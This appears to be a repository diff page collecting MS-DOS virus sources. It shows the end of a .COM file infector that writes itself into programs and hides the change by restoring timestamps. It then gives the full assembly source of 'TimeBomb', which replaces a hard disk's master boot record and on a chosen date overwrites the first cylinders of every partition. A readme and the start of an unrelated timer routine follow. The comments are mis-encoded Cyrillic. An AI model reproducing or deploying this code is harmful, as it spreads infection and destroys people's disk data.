SUB DX,31DH ; DX points at the start of
; the virus code
INT 21H ; Write the viral-code to the
; file
JC Set_FileDate_Time_Back ; If an error occured
CMP AX,3ABH ; 3ABh bytes written?
JNE Set_FileDate_Time_Back ; No
MOV AX,4200H ; Move Read/Write Pointer to
MOV CX,0 ; the beginning of the file
MOV DX,0 ; at offset CX:DX(=00:00)
INT 21H ;
MOV AH,40H ; Write the 1st three new
MOV CX,3 ; bytes to the file. These
MOV DX,SI ; bytes contain the JMP
ADD DX,0DH ; instruction to the virus.
INT 21H ;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Set File-Time/Date back ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Set_FileDate_Time_Back:
MOV DX,[SI+6] ; Get File-Date
MOV CX,[SI+4] ; Get File-Time
MOV AX,5701H ; Set back the File-Time and
INT 21H ; Date stamps
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Close the File ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
MOV AH,3EH ;
INT 21H ; Close the File
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Set File Attribute back ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Set_FileAttributes_Back:
MOV AX,4301H ;
MOV CX,[SI+8] ; Get File Attribute
MOV DX,26H ;
ADD DX,SI ;
INT 21H ; Set File Attribute
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Restore Org DTA address ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
Restore_Org_DTA:
PUSH DS
MOV AH,1AH
MOV DX,[SI] ; Get Original DTA
MOV DS,[SI+2] ; address
INT 21H ; St DTA to ds:dx
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Put 3 Original 1st three bytes in place and execute original program ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
POP DS ; Restore DS
PUSH SI ; Store SI
CLD ;
ADD SI,81H ; Address where the 1st three
; bytes can be found.
MOV DI,100H ; Destination Address
MOV CX,3 ; Number of bytes to move
REP MOVSB ; Move the bytes
POP SI ; Restore SI
POP CX ; Restore CX
XOR AX,AX ; Zero register
XOR BX,BX ; Zero register
XOR DX,DX ; Zero register
XOR SI,SI ; Zero register
MOV DI,100H
PUSH DI ; Store DI
XOR DI,DI ; Zero register
RET 0FFFFH ; Terminate Virus-Code and
; execute original program.
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ Virus Data Area ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
ORG_DTA_ADD: DW ? ; Storing place for BX of
; original DTA
DW ? ; Storing place for ES of
; original DTA
File_Time: DW ? ; Storing place for the
; filetime of the file
Date: DW ? ; Storing place for the
; filedate
Attrib: DW ? ; Storing place for the
; file attributes.
Three_Bytes: DB 0E9h, 27h, 03h
First_New_Byte: DB 0E9h ; First new byte of the
; the infected file. This is
; the jump instruction.
Length_Min_3: DB 0Dh, 27h ; Also new address to jump
; to for the virus on exe-
; cution, 2nd and 3rd new byte
Search_Spec: DB '*.COM',00h
Path_Add_Org: DW 00,05
Path_Add_Vir: DW '6M'
DB 'PATH=', 00, 00
Destruc_Code_1: DB 0B4h, 0h, 0CDh, 20h, 90h
File_Path: DB 'VIRCOM.COM' ; Filename including PATH
DB 30 DUP(0)
New_DTA:
DB 02
DB '????????COM'
DB 03, 11H
DB 7 DUP (0)
DB 20H, 80H, 12H, 17H, 15H, 10H
DB 27H, 0, 0
FileName: DB 'VIRCOM.COM', 00h, 00h, 00h
Destruc_Code_2: DB 0F4H, 0F4H, 0F4H, 0F4H
Destruc_Code_3: DB 0CDH, 19H, 0CDH, 19H, 0E9H
First_3_Bytes: DB 0E9h, 45h, 45h
Notice: DB '(C) Monxla'
Time ENDP
SEG_A ENDS
END START


472
MSDOS/Virus.MSDOS.Unknown.timebomb.asm Normal file
View File

@ -0,0 +1,472 @@
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; (C) ANS (Armourer) TimeBomb Ver 1.00 25 Jun
; FIDOnet 2:461/29.444 FreeWare, SourceWare 1995
;
;
; <20>®«­®áâìî § ¬¥­ï¥â MBR. <20>® ¤®á⨦¥­¨¨ ®¯à¥¤¥«¥­­®© ¤ âë ä â «ì­® £à®å ¥â ¢¨­â
;
; ‘â àë© MBR § ¯¨á뢠¥âáï ¢ ä ©« c:\mbr.bak, çâ®¡ë ¬®¦­® ¡ë«® ¢®ááâ ­®¢¨âì,
; ¥á«¨ çâ®. “¯à ¢«¥­¨ï áâ àë© MBR ­¥ ¯®«ãç ¥â, â ª çâ® ¥á«¨ ®­ ¤¥« « çâ®-â®
; ¡®«¥¥ 㬭®¥, ­¥¦¥«¨ § £à㧪  á¨á⥬ë á  ªâ¨¢­®£® à §¤¥«  - TimeBomb ¯à¨¤¥âáï
; ¯¥à¥¤¥« âì.
;
; <20>ਠáà ¡ â뢠­¨¨ TimeBomb § â¨à îâáï ¯¥à¢ë¥ 4 樫¨­¤à  ª ¦¤®£® à §¤¥«  ­ 
; ¢¨­â¥, ¢ª«îç ï «®£¨ç¥áª¨¥ ¤¨áª¨ DOS (extended partition)
;
; ‘«¥¤ã¥â § ¬¥â¨âì, çâ® Non-DOS à §¤¥«ë (HPFS, ­ ¯à¨¬¥à) ¯à¨ í⮬ ¯®áâà ¤ îâ
; ­¥§­ ç¨â¥«ì­® - ¢ á¢ï§¨ á ª®à¥­­ë¬ ®â«¨ç¨¥¬ ¨å áâàãªâãàë ®â DOS FAT.
;
killed_cyl = 4 ; —¨á«® 㡨¢ ¥¬ëå 樫¨­¤à®¢ ¢ ª ¦¤®¬ à §¤¥«¥
xor_value = 73h ; ‡­ ç¥­¨¥ § è¨ä஢ ­¨ï ‚ è¥£® ¯®á«¥¤­¥£® á«®¢  ;-)
locals
cseg segment
assume cs:cseg
org 100h
.286
start proc near
;
; ˆ­áâ ««ïæ¨ï
;
; <20>஢¥à塞 ª®¬ ­¤­ãî áâபã
mov si, 80h
mov bl, byte ptr [si]
xor bh, bh
cmp bl, 8
jnc @@checkdate
help:
; ª®¬ ­¤­®© áâப¥ ­¥ 㪠§ ­  ¤ â  - ¢ë¢®¤¨¬ ¯®¤áª §ªã
mov dx, offset @@title
mov ah, 9
int 21h
int 20h
; <20>®«ã祭¨¥ BCD-ç¨á«  ¨§ ª®¬. áâப¨
getBCD proc near
dec si
mov ax, word ptr [si+bx] ; <20>¥à¥¬ ¯®á«¥¤­¨¥ ¤¢¥ æ¨äàë
sub ax, '00' ; ASCII -> BIN
xchg al, ah
db 0d5h, 10h ; AAD á ¬®¤¨ä¨ª â®à®¬ 16
cmp al, 9ah
jnc help
dec si ; ‘ࠧ㠯¥à¥å®¤¨¬ ª á«¥¤ãî饬㠯®«î
dec si
retn
getBCD endp
@@checkdate: ; <20>஢¥à塞 ¤ âã (á­ ç «  £®¤, § â¥¬ ¬¥áïæ, § â¥¬ ç¨á«®)
; ¨ ¯à¨¢®¤¨¬ ¥¥ ª ­ã¦­®¬ã ä®à¬ âã
; Š®à४⭮áâì ¤ âë ­¥ ¯à®¢¥à塞 - ¦â® ¯à®¡«¥¬  ¯®«ì§®¢ â¥«ï -
; çâ® ®­ â ¬ ¢¢¥«
call getBCD ; <20>¥à¥¬ æ¨äàë £®¤ 
mov byte ptr year, al ; <20>®«ã稫¨ BCD-year
cmp byte ptr [bx+si+1], '.' ; <20>஢¥à塞 à §¤¥«¨â¥«ì
jne help
call getBCD ; <20>¥à¥¬ æ¨äàë ¬¥áïæ 
mov byte ptr month, al ; <20>®«ã稫¨ BCD-month
cmp byte ptr [bx+si+1], '.' ; <20>஢¥à塞 à §¤¥«¨â¥«ì
jne help
call getBCD ; <20>¥à¥¬ æ¨äàë ¤­ï
mov byte ptr day, al ; <20>®«ã稫¨ BCD-day
@@singledisk:
;
; ‡ ¬¥­ï¥¬ MBR ¢¨­â  ᢮¨¬ ª®¤®¬ ¨§ bomb proc
;
; —¨â ¥¬ áâ àë© MBR, á®å࠭塞 ¥£® ¢ c:\mbr.bak, ¯¨è¥¬ ᥡï
;
; —¨â ¥¬ MBR
mov cx, 1
mov dx, 80h
mov ax, 201h
mov bx, offset buffer
int 13h
jnc @@rd_ok
mov dx, offset @@rd_err
@@err_exit: ; ‚뢮¤ á®®¡é¥­¨ï ¨§ DX ¨ ¢ë«¥â ¯® ®è¨¡ª¥
mov ah, 9
int 21h
retn
@@rd_ok:
; ‘®§¤ ¥¬ ä ©«
mov dx, offset @@fname
xor cx, cx
mov ah, 3ch
int 21h
jnc @@cr_ok
mov dx, offset @@cr_err
jmp @@err_exit
@@cr_ok:
; <20>¨è¥¬ ¢ ä ©«
mov bx, ax
mov cx, 512
mov dx, offset buffer
mov ah, 40h
int 21h
jnc @@wr_ok
mov dx, offset @@wr_err
jmp @@err_exit
@@wr_ok:
; ‡ ªà뢠¥¬ ä ©«
mov ah, 3eh
int 21h
;
; <20>¥à¥­®á¨¬ ᢮© MBR ­  ¬¥áâ® áâ à®£®
;
mov si, offset bomb
mov di, offset buffer
mov bx, di
mov cx, di
sub cx, si
cld
rep movsb
;
; ‡ ¯¨á뢠¥¬ ­®¢ë© MBR ¯®¢¥àå áâ à®£®
;
mov cx, 1
mov dx, 80h
mov ax, 301h
int 13h
mov dx, offset @@mbr_wr_err
jc @@err_exit
mov dx, offset @@done_msg
jmp @@err_exit
; ‘®®¡é¥­¨ï ®¡ ®è¨¡ª å
@@rd_err: db 'Error read the MBR of C:',13,10,'$'
@@cr_err: db 'Error creating the '
@@fname: db 'C:\MBR.BAK',0,'file',13,10,'$'
@@wr_err: db 'Error writing backup file',13,10,'$'
@@mbr_wr_err: db 'Error writing new MBR',13,10,'$'
@@done_msg: db 'Your MBR replaced by TimeBomb',13,10,'$'
; ‡ áâ ¢ª 
@@title:
db 13,10,10
db '(C) Armourer TimeBomb Ver 1.00 25 Jun 1995',13,10,10
db ' Usage: timebomb <date>',13,10,10
db ' Where <date> is a fatal date for your computer.',13,10
db ' Date format must be in exUSSR standard: DD.MM.YY',13,10,10
db 'Good Luck ;)',13,10,'$'
start endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; ’¥ªáâ ¡®¬¡ë. Š®¬¡¨­¨àã¥âáï á MBR (®â MBR ¡¥à¥âáï ¯ àâ¨è­)
;
; <20>â®â ª®¤ ¡ã¤¥â áâ à⮢ âì á  ¤à¥á  0:7c00h
;
bomb proc near
; <20> áâà ¨¢ ¥¬ á⥪ ¨ ¯¥à¥­®á¨¬ MBR, ªã¤  ­ ¤® (0:600h)
cli
mov ax, cs
mov ss, ax
mov ds, ax
mov es, ax
mov si, 7c00h
mov sp, si
push si ; <20>â® ­ã¦­® ¤«ï ¯®á«¥¤ãî饣® áâ àâ  boot' 
cld
mov cx, 1beh / 2 ; <20>®á«¥ â ª®£® ¯¥à¥­®á  SI ¡ã¤¥â 㪠§ë¢ âì
mov di, 600h ; ­  ¯ àâ¨è­
rep movsw
push ax ; ‘¥£¬¥­â
push offset beginbomb - offset bomb + 600h ; ‘¬¥é¥­¨¥
retf
beginbomb:
; <20>஢¥à塞 ¢à¥¬ï
mov ah, 4
int 1ah ; <20>à®ç«¨ ¤ âã ¢ CX:DX
jc @@skipbomb ; …᫨ ç áë ­¥ à ¡®â îâ -> ¯à®¯ã᪠¥¬ ¯à®¢¥àªã
year = $ + 2
cmp cl, 12h ; <20>஢¥à塞 £®¤
jc @@skipbomb ; ƒ®¤ ­¥ ᮢ¯ « ;)
jne @@explode ; …᫨ íâ®â £®¤ ¯à®è¥« - ¢§à뢠¥¬áï ­¬¥¤«¥­­®
month = $ + 3
day = $ + 2
cmp dx, 1234h ; ˆ¬¥­­® â ª, çâ®¡ë ­¥ ᣥ­¥à¨à®¢ «áï
; ª®à®âª¨© ¢ à¨ ­â ¤«ï CMP
jc @@skipbomb ; <20>¥ ᮢ¯ « ¤¥­ì ¨ ¬¥áïæ
@@explode:
;
; ‚ᥠᮢ¯ «®, ¯à¨è«  ç¥à­ ï ¯®à ...
;
; ‘â¨à ¥¬ ¯¥à¢ë¥ 樫¨­¤àë ª ¦¤®£® à §¤¥«  (¢ª«îç ï «®£¨ç¥áª¨¥
; ¤¨áª¨ DOS)
;
; “áâ ­ ¢«¨¢ ¥¬ ¢ ª®¤¥ ¡®¬¡ë ¯ à ¬¥âàë ¢¨­â 
mov dl, 80h
call destroy
; “áâ ­ ¢«¨¢ ¥¬ ¯ à ¬¥âàë  â®à®£® ¢¨­â , ¥á«¨ ®­ ¥áâì
ror dl, 1 ; …᫨ ®¤¨­ ¤¨áª, ä« £ CF ¡ã¤¥â ãáâ ­®¢«¥­
jc @@singledisk
mov dl, 81h
call destroy
@@singledisk:
jmp @@incorrect ; ‚뢮¤¨¬ á®®¡é¥­¨¥ "Missing operating ssytem"
@@skipbomb:
;
; Žâà ¡®âª  ­®à¬ «ì­®£® ª®¤  MBR
;
; ˆé¥¬ § £à㧮ç­ë© à §¤¥«
mov cl, 4 ; …áâì ¢á¥£® 4 ¢ à¨ ­â  ...
@@searchboot: ; –¨ª« ¯®¨áª 
mov dx, word ptr [si] ; ‘ࠧ㠧 £à㦠¥¬ ¢ DX â®, çâ® ­ã¦­®
cmp dl, 80h ; <20>â®â à §¤¥« § £à㧮ç­ë© ?
je @@boot
add si, 10h ; <20>¥à¥å®¤¨¬ ª á«¥¤ãî饩 § ¯¨á¨
loop @@searchboot
; <20>¥ ­ è«¨ - ¢ë¤ ¥¬ á®®¡é¥­¨¥
@@incorrect:
call errmsg
db 'Missing operating system',0
@@boot: ; ‡ £à㦠¥¬ boot-ᥪâ®à ¨ ¯¥à¥¤ ¥¬ ¥¬ã ã¯à ¢«¥­¨¥
mov cx, word ptr [si+2] ; —â® ­ ¤® - ¢ CX
mov ax, 201h ; —¨â ¥¬ 1 ᥪâ®à
pop bx ; <20>®  ¤à¥áã 0:7c00h
push bx
int 13h
jnc @@exit
call errmsg
db 'Error reading operating system',0
@@exit:
cmp word ptr [bx + 510], 0aa55h
jne @@incorrect
retn ; ‡ ¯ã᪠¥¬ boot
;
; <09>®¤¯à®£à ¬¬ë
;
; ‚ë¤ ç  á®®¡é¥­¨ï ®¡ ®è¨¡ª¥
errmsg proc near
sti
cld
pop si
mov ah, 0eh
@@nextchar:
lodsb
or al, al
je $
int 10h
jmp @@nextchar
errmsg endp
; Ž¡å®¤ ¢á¥å à §¤¥«®¢ ¤¨áª  á § ¯¨áìî ¨å ¯ à ¬¥â஢ ¢ ¡ãä¥à
getpart proc near
; <20>⮠४ãàᨢ­ ï äã­ªæ¨ï.
; <20>  ¢å®¤¥ ¢ SI âॡã¥âáï 㪠§ â¥«ì ­  ®ç¥à¥¤­®© à §¤¥«
; ¡ãä¥à ¯®  ¤à¥áã ES:DI ¯¨èãâáï ¯ à ¬¥âàë ⥪.à §¤¥« 
mov cx, 4 ; ‘ç¥â稪 à §¤¥«®¢ ¢ ª ¦¤®¬ MBR
@@nextpart:
; <20>஢¥à塞 ⨯ à §¤¥« 
cmp byte ptr [si+4], 0 ; <20>¥¨á¯®«ì§ã¥¬ë© à §¤¥«
je @@exit
; <20>¨è¥¬ ¢ ¡ãä¥à ¯ à ¬¥âàë à §¤¥« 
mov ax, word ptr [si] ; ƒ®«®¢ 
stosw
mov dx, ax ; ƒ®â®¢¨¬áï ª® ¢å®¤ã ¢ ४ãàá¨î
disk1 = $ + 1
mov dl, 80h ; <20>®¬¥à ®¡à ¡ â뢠¥¬®£® ¤¨áª 
mov ax, word ptr [si+2]
stosw ; –¨«¨­¤à/ᥪâ®à
; ‘­®¢  ¯à®¢¥à塞 ⨯ à §¤¥«  - ­¥ à áè¨à¥­­ë© «¨ ®­ ?
cmp byte ptr [si+4], 5
jne @@exit ; <20>¥â - ¨¤¥¬ ¤ «ìè¥
; <20>ëà塞 ¢ ४ãàá¨î
; —¨â ¥¬ MBR à áè¨à¥­­®£® à §¤¥« 
push cx ; ‘®å࠭塞 áç¥â稪
push si ; ‘®å࠭塞 㪠§ â¥«ì ­  à §¤¥«ë
add bx, 512 ; <20>த¢¨£ ¥¬ 㪠§ â¥«ì ­  ¡ãä¥à
mov cx, ax ; ‘¥©ç á CX:DX 㪠§ë¢ îâ ­  MBR
mov ax, 201h ; à áè¨à¥­­®£® à §¤¥« 
int 13h ; —¨â ¥¬ à áè¨à¥­­ë© à §¤¥« ¢ 0:BX
jnc @@rec ; <20>஢¥àª  ­  ª®à४⭮áâì
; ‚ë室¨¬ ¨§ ४ãàᨨ ¢ á«ãç ¥ á¡®ï
pop si
pop cx
sub bx, 512
jmp @@exit
@@rec:
mov si, bx ; “áâ ­ ¢«¨¢ ¥¬ 㪠§ â¥«ì
add si, 1beh ; ­  â ¡«¨æã à §¤¥«®¢
call getpart
@@exit:
add si, 10h
loop @@nextpart
; ‚ë室 ¨§ ४ãàᨨ
sub bx, 512
pop dx
pop si
pop cx
push dx
retn
getpart endp
; “­¨ç⮦¥­¨¥ ᮤ¥à¦¨¬®£® ⥪ã饣® ¤¨áª 
destroy proc near
; <20>®«ãç ¥¬ ¯ à ¬¥âàë ¢¨­â , 㪠§ ­­®£® ¢ DL
mov byte ptr ds:[offset disk - offset bomb + 600h], dl
mov byte ptr ds:[offset disk1 - offset bomb + 600h], dl
mov ah, 8
int 13h
mov byte ptr ds:[heads - offset bomb + 600h], dh
and cl, 63
mov byte ptr ds:[sectors - offset bomb + 600h], cl
push dx
mov bx, 0a00h ; <20>ãä¥à ¤«ï ç⥭¨ï MBR à áè¨à¥­­ëå à §¤¥«®¢
; <20>® 室㠤¥«  ª BX ¡ã¤¥â ¯à¨¡ ¢«ïâìáï ¯® 512 -
; â ª çâ® ¬ ªá¨¬ «ì­ë© ã஢¥­ì ¢«®¦¥­­®áâ¨
; á®áâ ¢¨â 57 à §¤¥«®¢
mov di, 500h ; <20>ãä¥à ¯®¤ ¯ à ¬¥âàë ¤«ï int 13h (64 ¤¨áª )
; <20>¥ªãàᨢ­® ®¡å®¤¨¬ «®£¨ç¥áª¨¥ ¤¨áª¨, § ¯¨áë¢ ï ¢ ¡ãä¥à ¯ à ¬¥âàë
; ¤«ï int 13h
push si ; Š®à४â­ë© ¢å®¤ ¢ ४ãàá¨î
push cx
xor ax, ax ; “áâ ­®¢ª  ¤«ï áâ¨à ­¨ï £« ¢­®£® MBR
stosw
inc ax
stosw
call getpart ; Ž¡å®¤ à §¤¥«®¢
; ‘®§¤ ¥¬ §­ ç¥­¨¥ ¯à®¯¨á뢠­¨ï
; ‘¥©ç á ¢ bx «¥¦¨â ¤«¨­  ¯à®¯¨á뢠¥¬ëå ¤ ­­ëå ¢ ¯ à £à ä å - 800h
push di ; ‘®å࠭塞 㪠§ â¥«ì ­  墮áâ ᯨ᪠ ¯ à ¬¥â஢
mov di, bx ; DI ¡ã¤¥â 㪠§ â¥«ì ­  ¡ãä¥à ¤«ï ¤ ­­ëå
shl di, 4 ; <20>ãä¥à ¡ã¤¥â à á¯®« £ âìáï ᮠᬥ饭¨ï 8000h
push di ; ‘®å࠭塞  ¤à¥á ¡ãä¥à  § ¯®«­¥­¨ï
@@nextword:
mov si, offset lmd - offset bomb + 600h
mov cx, 16
@@nextchar:
lodsb
xor al, xor_value
stosb
loop @@nextchar
dec bx
jne @@nextword
; ˆ¤¥¬ ­ § ¤ ¯® ¡ãä¥àã
pop bx ; ‚®ááâ ­ ¢«¨¢ ¥¬  ¤à¥á ¡ãä¥à 
pop si ; ‚®ááâ ­ ¢«¨¢ ¥¬ 㪠§ â¥«ì ­  ¯ à ¬¥âàë
mov cx, si ; ‚ëç¨á«ï¥¬ ç¨á«® § â¨à ¥¬ëå à §¤¥«®¢
sub cx, 500h
shr cx, 2
std
lodsw ; <20>¥à¥å®¤¨¬ ª ¯®á«¥¤­¥© § ¯¨á¨ ¢ ¡ãä¥à¥
@@nextpart:
push cx ; ‘®å࠭塞 áç¥â稪
lodsw ; <20>¥à¥¬ ¯ à ¬¥âàë à §¤¥« 
mov cx, ax ; –¨«¨­¤à/ᥪâ®à
lodsw
mov dx, ax ; ƒ®«®¢ 
disk = $ + 1
mov dl, 80h ; <20>®¬¥à § â¨à ¥¬®£® ¤¨áª 
mov si, killed_cyl ; ‘ç¥â稪 㡨¢ ¥¬ëå 樫¨­¤à®¢
; <20>ய¨á뢠¥¬ à §¤¥«
@@nexthead:
sectors = $ + 1
mov ax, 310h ; !!!!
int 13h
inc dh ; ‘«¥¤ãîé ï £®«®¢ 
heads = $ + 2
cmp dh, 16 ; ‚¥áì 樫¨­¤à ?
jne @@nexthead
add cx, 64 ; ‘«¥¤ãî騩 樫¨­¤à
xor dh, dh ; <20> ç¨­ ¥¬ á ­ã«¥¢®© £®«®¢ë
dec si
jne @@nexthead
pop cx ; ‚®ááâ ­ ¢«¨¢ ¥¬ áç¥â稪
loop @@nextpart ; ¨ ªàã⨬ 横« ¯® à §¤¥« ¬
pop dx
retn
destroy endp
lmd:
irpc ch, <LAMERS MUST DIE.>
db '&ch' xor xor_value
endm
bomb endp
buffer: ; ‘ ¡ã¤¥¬ ç¨â âì áâ àë© mbr
dw offset buffer - offset bomb
cseg ends
end start

19
MSDOS/Virus.MSDOS.Unknown.timebomb.doc Normal file
View File

@ -0,0 +1,19 @@
ÉÍËÍËÍËÍËÍËÍËÍËÍ»
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ͹ Just another stuff from
º Ú¿  Ú¿ ÚÄ º ͹
º ³ ³ ³Á³ à º ͹ ÄÄÄÄ<Ä Private Armoury Ä>ÄÄÄÄ
º Á Á Á Á ÀÄ º ͹
ÌÍÍÍÑÍÍÍÍÍÍÑÍÍ͹ ͹ FIDOnet 2:461/29.444
ÌÍÍ͵ BOMB ÆÍÍ͹ ͼ
ÈÍÍÍÏÍÍÍÍÍÍÏÍÍͼ
>-> ˆ­áâ ««ïæ¨ï ¢ MBR á ¯®«­®© § ¬¥­®© ®à¨£¨­ «ì­®£® § £àã§ç¨ª 
>-> Ž¤­®ªà â­ë© ¢§àë¢ ¯® ¤®á⨦¥­¨¨ 㪠§ ­­®© ¯à¨ ¨­áâ ««ï樨 ¤ âë
>-> <09>®«­®¥ ã­¨ç⮦¥­¨¥ ¢á¥å DOS-à §¤¥«®¢ ­  1 ¨ 2 ¦¥áâª¨å ¤¨áª å
>-> ‘ãé¥á⢥­­®¥ ¯®¢à¥¦¤¥­¨¥ Non-DOS à §¤¥«®¢ â ¬ ¦¥
<-< ‘®åà ­¥­¨¥ ¯à¥¦­¥£® MBR ¢ ä ©«¥ C:\MBR.BAK
<-< <09>®«­®áâìî ª®¬¬¥­â¨à®¢ ­­ë© ¨á室­ë© ⥪áâ (asm286)
>-> >-> €¢â®à á­¨¬ ¥â á á¥¡ï ¢áïªãî ®â¢¥âá⢥­®áâì §  «î¡ë¥ <-< <-<
>-> >-> ¯®¢à¥¦¤¥­¨ï ¨­ä®à¬ æ¨¨, ¯à®¨§®è¥¤è¨¥ ¢ १ã«ìâ â¥ <-< <-<
>-> >-> ­¥®áâ®à®¦­®£® ®¡à é¥­¨ï á ¤ ­­®© ¯à®£à ¬¬®©... ;))) <-< <-<

141
MSDOS/Virus.MSDOS.Unknown.timer.asm Normal file
View File

@ -0,0 +1,141 @@
PAGE ,132
title \asm_sour\timer.asm HIGH ACCURACY TIMER
subttl michael e. walraven
.MODEL MEDIUM
name timer
.cref
.lall
;
; High resolution timer, returns a 32 bit high resolution
; value which is the amount of elapsed time since the function
; was last called. The counts are 838.2ns each (1.19318 MHz)
; time_int() must be called first to set the timer chip to
; the proper mode.
; Counter 0 is changed in time_int() and the data from this
; counter is used in elaptime() so it must not be changed
; between calls.
; There should not be any interference in system timing
; max of 55 msec error introduced by time_int() into absolute
; system time.
; MEDIUM memory model/microsoft 5.00
; FAR PROGRAM, NEAR DATA
; cs: is code segment
; es: and ds: are data segment
; ss: within data segment
; ax: for integer return
; dx:ax: for long return
.DATA
; these data items located in the DSEG and can be accessed
; as near by C programs
PUBLIC SYS_HI
PUBLIC SYS_LOW
PUBLIC TIMER_COUNT
SYS_HI DW ? ;TIMER_HI VALUE FOR PREVIOUS CALL
SYS_LOW DW ? ;TIMER_LOW VALUE FOR PREVIOUS CALL
TIMER_COUNT DW ? ;8253 TIMER COUNT FOR PREVIOUS CALL
; NO ARGUMENTS PASSED to either function
TIMER_MODE EQU 043H
TIMER0 EQU 040H
BIOS SEGMENT AT 040H
ORG 06CH
TIMER_LOW DW ?
TIMER_HI DW ?
BIOS ENDS
PAGE
.CODE
PUBLIC _time_int
_time_int PROC
; void far time_int(void);
;
; SET THE TIMER MODE FOR PULSE OUTPUT, RATHER THAN SQUARE
; MODE AS SET BY DOS
MOV AL,00110100B ;CTR 0, LSB THEN MSB
;MODE 2, BINARY
OUT TIMER_MODE,AL ;MODE REGISTER FOR 8253
SUB AX,AX ;SET 0, RESULT IN MAX COUNT
OUT TIMER0,AL
OUT TIMER0,AL
RET
_time_int ENDP
PUBLIC _elaptime
_elaptime PROC
; long int far elaptime(void);
;
; DETERMINE ELAPSED TIME SINCE LAST CALL
; RETURNS 32 BIT (LONG) VALUE WHICH IS
; NEW - TIMER_HI:TIMER_LO:TIMER_COUNT MINUS
; OLD - TIMER_HI:TIMER_LO:TIMER_COUNT
; ASSUMPTION MADE THAT 32 BITS WILL NOT OVERFLOW!!!!
PUSH ES
MOV AX,BIOS
MOV ES,AX
ASSUME ES:BIOS
MOV AL,0 ;PREPARE TO LATCH COUNTER
OUT TIMER_MODE,AL ;LATCH 8253
PUSHF ;SAVE INTERRUPT STATE
CLI ;TURN INTERRUPT OFF WHILE READING CODE
IN AL,TIMER0
MOV DL,AL
IN AL,TIMER0
MOV DH,AL ;DX HAS NEW CHIP COUNT(count down value)
MOV BX,ES:TIMER_LOW ;BX HAS SYSTEM TIME LOW WORD
MOV AX,ES:TIMER_HI ;AX HAS SYSTEM TIME HIGH WORD
; NOW HAVE A 48 BIT WORD AX:BX:DX FOR THE PRESENT TIME
MOV CX,TIMER_COUNT ;SWAP AND SUBTRACT
MOV TIMER_COUNT,DX
SUB CX,DX
; CX: HAS LOW 16 BITS OF DIFFERENCE
MOV DX,SYS_LOW ;SWAP AND SUBTRACT
